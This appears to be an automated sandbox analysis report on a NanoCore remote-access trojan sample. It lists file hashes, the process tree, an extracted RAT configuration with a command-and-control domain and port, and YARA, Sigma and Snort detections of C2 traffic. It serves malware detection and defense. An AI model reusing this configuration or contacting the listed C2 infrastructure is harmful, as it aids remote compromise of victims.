Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PhviZrlpkW.exe

Overview

General Information

Sample Name:PhviZrlpkW.exe
Analysis ID:798336
MD5:565044691fedb39980cb814dc26f9ebd
SHA1:d92f48359c385fd03a419e583495ead52428654e
SHA256:3a1c1eabfbe52d5a822e95462e730775ea9eef9d8d653f3a1ff6904378ad3e0c
Tags:exeNanoCoreRAT
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
.NET source code contains potential unpacker
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • PhviZrlpkW.exe (PID: 4624 cmdline: C:\Users\user\Desktop\PhviZrlpkW.exe MD5: 565044691FEDB39980CB814DC26F9EBD)
    • tchnhwrvi.exe (PID: 2120 cmdline: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo MD5: 64F982758878F6A97ED4B3D99CFBD371)
      • tchnhwrvi.exe (PID: 1312 cmdline: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe MD5: 64F982758878F6A97ED4B3D99CFBD371)
  • edpm.exe (PID: 2468 cmdline: "C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe" "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca MD5: 64F982758878F6A97ED4B3D99CFBD371)
    • WerFault.exe (PID: 1256 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • edpm.exe (PID: 5104 cmdline: "C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe" "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca MD5: 64F982758878F6A97ED4B3D99CFBD371)
    • WerFault.exe (PID: 3692 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 632 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "fc2f5233-89c0-4cab-99aa-8d389dd5", "Domain1": "thesopranos.duckdns.org", "Domain2": "thesopranos.duckdns.org", "Port": 1365, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xe91:$a: NanoCore
    • 0xeea:$a: NanoCore
    • 0xf27:$a: NanoCore
    • 0xfa0:$a: NanoCore
    • 0x1464b:$a: NanoCore
    • 0x14660:$a: NanoCore
    • 0x14695:$a: NanoCore
    • 0x222aa:$a: NanoCore
    • 0x222cf:$a: NanoCore
    • 0x22328:$a: NanoCore
    • 0x324c5:$a: NanoCore
    • 0x324eb:$a: NanoCore
    • 0x32547:$a: NanoCore
    • 0x3f39c:$a: NanoCore
    • 0x3f3f5:$a: NanoCore
    • 0x3f428:$a: NanoCore
    • 0x3f654:$a: NanoCore
    • 0x3f6d0:$a: NanoCore
    • 0x3fce9:$a: NanoCore
    • 0x3fe32:$a: NanoCore
    • 0x40306:$a: NanoCore
    00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
    • 0xf27:$a1: NanoCore.ClientPluginHost
    • 0x14695:$a1: NanoCore.ClientPluginHost
    • 0x222cf:$a1: NanoCore.ClientPluginHost
    • 0x324eb:$a1: NanoCore.ClientPluginHost
    • 0x3f654:$a1: NanoCore.ClientPluginHost
    • 0x45ba2:$a1: NanoCore.ClientPluginHost
    • 0x4bb73:$a1: NanoCore.ClientPluginHost
    • 0x555df:$a1: NanoCore.ClientPluginHost
    • 0x5fa0a:$a1: NanoCore.ClientPluginHost
    • 0x6a9e7:$a1: NanoCore.ClientPluginHost
    • 0xeea:$a2: NanoCore.ClientPlugin
    • 0x14660:$a2: NanoCore.ClientPlugin
    • 0x222aa:$a2: NanoCore.ClientPlugin
    • 0x324c5:$a2: NanoCore.ClientPlugin
    • 0x3f6d0:$a2: NanoCore.ClientPlugin
    • 0x45c1c:$a2: NanoCore.ClientPlugin
    • 0x4bbbd:$a2: NanoCore.ClientPlugin
    • 0x556c9:$a2: NanoCore.ClientPlugin
    • 0x5faaa:$a2: NanoCore.ClientPlugin
    • 0x6a9be:$a2: NanoCore.ClientPlugin
    • 0x12be:$b1: get_BuilderSettings
    00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
    • 0x26455:$x1: NanoCore.ClientPluginHost
    • 0x26492:$x2: IClientNetworkHost
    • 0x29fc5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 100 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.tchnhwrvi.exe.4f14bbe.11.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
      • 0x170b:$x1: NanoCore.ClientPluginHost
      • 0x1725:$x2: IClientNetworkHost
      2.2.tchnhwrvi.exe.4f14bbe.11.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth (Nextron Systems)
      • 0x170b:$x2: NanoCore.ClientPluginHost
      • 0x34b6:$s4: PipeCreated
      • 0x16f8:$s5: IClientLoggingHost
      2.2.tchnhwrvi.exe.4f14bbe.11.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
      • 0x16e2:$x2: NanoCore.ClientPlugin
      • 0x170b:$x3: NanoCore.ClientPluginHost
      • 0x16d3:$i3: IClientNetwork
      • 0x16f8:$i6: IClientLoggingHost
      • 0x1725:$i7: IClientNetworkHost
      • 0x154e:$s1: ClientPlugin
      • 0x16eb:$s1: ClientPlugin
      2.2.tchnhwrvi.exe.4f14bbe.11.unpackWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
      • 0x170b:$a1: NanoCore.ClientPluginHost
      • 0x16e2:$a2: NanoCore.ClientPlugin
      • 0x3a54:$b7: LogClientException
      • 0x16f8:$b9: IClientLoggingHost
      2.2.tchnhwrvi.exe.73f0000.33.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
      • 0x8ba5:$x1: NanoCore.ClientPluginHost
      • 0x8bd2:$x2: IClientNetworkHost
      Click to see the 336 entries

      Sigma Signatures

      AV Detection

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe, ProcessId: 1312, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe, ProcessId: 1312, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Stealing of Sensitive Information

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe, ProcessId: 1312, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe, ProcessId: 1312, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Snort Signatures

      Timestamp:192.168.2.4193.31.30.1384972613652816766 02/03/23-23:19:06.285273
      SID:2816766
      Source Port:49726
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384971313652816766 02/03/23-23:17:46.673206
      SID:2816766
      Source Port:49713
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384971813652816766 02/03/23-23:18:21.376630
      SID:2816766
      Source Port:49718
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384972113652816766 02/03/23-23:18:33.469715
      SID:2816766
      Source Port:49721
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384971613652816766 02/03/23-23:18:07.532553
      SID:2816766
      Source Port:49716
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384971413652816766 02/03/23-23:17:53.669627
      SID:2816766
      Source Port:49714
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384972313652816766 02/03/23-23:18:47.034655
      SID:2816766
      Source Port:49723
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:193.31.30.138192.168.2.41365497022810290 02/03/23-23:17:30.731633
      SID:2810290
      Source Port:1365
      Destination Port:49702
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384972513652816718 02/03/23-23:18:58.945928
      SID:2816718
      Source Port:49725
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384970213652816766 02/03/23-23:17:32.574212
      SID:2816766
      Source Port:49702
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384971713652816766 02/03/23-23:18:13.577404
      SID:2816766
      Source Port:49717
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384971413652816718 02/03/23-23:17:52.672539
      SID:2816718
      Source Port:49714
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384971213652816766 02/03/23-23:17:40.364031
      SID:2816766
      Source Port:49712
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384972213652816766 02/03/23-23:18:41.032521
      SID:2816766
      Source Port:49722
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384972513652816766 02/03/23-23:18:59.896530
      SID:2816766
      Source Port:49725
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384969313652816766 02/03/23-23:17:25.471865
      SID:2816766
      Source Port:49693
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384971513652816766 02/03/23-23:18:01.525116
      SID:2816766
      Source Port:49715
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384969113652816766 02/03/23-23:17:14.041382
      SID:2816766
      Source Port:49691
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384972013652816766 02/03/23-23:18:27.458779
      SID:2816766
      Source Port:49720
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.4193.31.30.1384972413652816766 02/03/23-23:18:53.018271
      SID:2816766
      Source Port:49724
      Destination Port:1365
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: PhviZrlpkW.exeReversingLabs: Detection: 57%
      Source: PhviZrlpkW.exeVirustotal: Detection: 52%Perma Link
      Antivirus detection for URL or domain
      Source: thesopranos.duckdns.orgAvira URL Cloud: Label: malware
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeReversingLabs: Detection: 65%
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeVirustotal: Detection: 52%Perma Link
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeReversingLabs: Detection: 65%
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeVirustotal: Detection: 52%Perma Link
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e30ee8.19.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441b408.27.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f8cc52.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f91a88.22.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441b408.27.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f91a88.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTR
      Source: 2.2.tchnhwrvi.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.2.tchnhwrvi.exe.5df0000.31.unpackAvira: Label: TR/NanoCore.fadte
      Source: 2.2.tchnhwrvi.exe.441b408.27.unpackAvira: Label: TR/NanoCore.fadte
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "fc2f5233-89c0-4cab-99aa-8d389dd5", "Domain1": "thesopranos.duckdns.org", "Domain2": "thesopranos.duckdns.org", "Port": 1365, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

      Compliance

      barindex
      Detected unpacking (creates a PE file in dynamic memory)
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeUnpacked PE file: 2.2.tchnhwrvi.exe.3330000.5.unpack
      Source: PhviZrlpkW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: PhviZrlpkW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: tchnhwrvi.exe, 00000001.00000003.303187367.000000001AB50000.00000004.00001000.00020000.00000000.sdmp, tchnhwrvi.exe, 00000001.00000003.304084780.000000001A9C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: tchnhwrvi.exe, 00000001.00000003.303187367.000000001AB50000.00000004.00001000.00020000.00000000.sdmp, tchnhwrvi.exe, 00000001.00000003.304084780.000000001A9C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\xampp\htdocs\2efa81c4e6b34188a21ceb28fac598e4\Loader\Release\Loader.pdb source: PhviZrlpkW.exe, 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp, PhviZrlpkW.exe, 00000000.00000002.314365455.0000000002859000.00000004.00000020.00020000.00000000.sdmp, tchnhwrvi.exe, 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp, tchnhwrvi.exe, 00000001.00000000.299162939.0000000000290000.00000002.00000001.01000000.00000004.sdmp, tchnhwrvi.exe, 00000002.00000000.302278058.0000000000290000.00000002.00000001.01000000.00000004.sdmp, edpm.exe, 00000003.00000002.364296668.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe, 00000003.00000000.330467592.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe, 00000007.00000000.351397609.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe, 00000007.00000002.364278841.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe.1.dr, tchnhwrvi.exe.0.dr, nse83F1.tmp.0.dr
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00406715 FindFirstFileExW,2_2_00406715

      Networking

      barindex
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49691 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49693 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 193.31.30.138:1365 -> 192.168.2.4:49702
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49702 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49712 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49713 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49714 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.2.4:49714 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49715 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49716 -> 193.31.30.138:1365
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49717 -> 193.31.30.138:1365
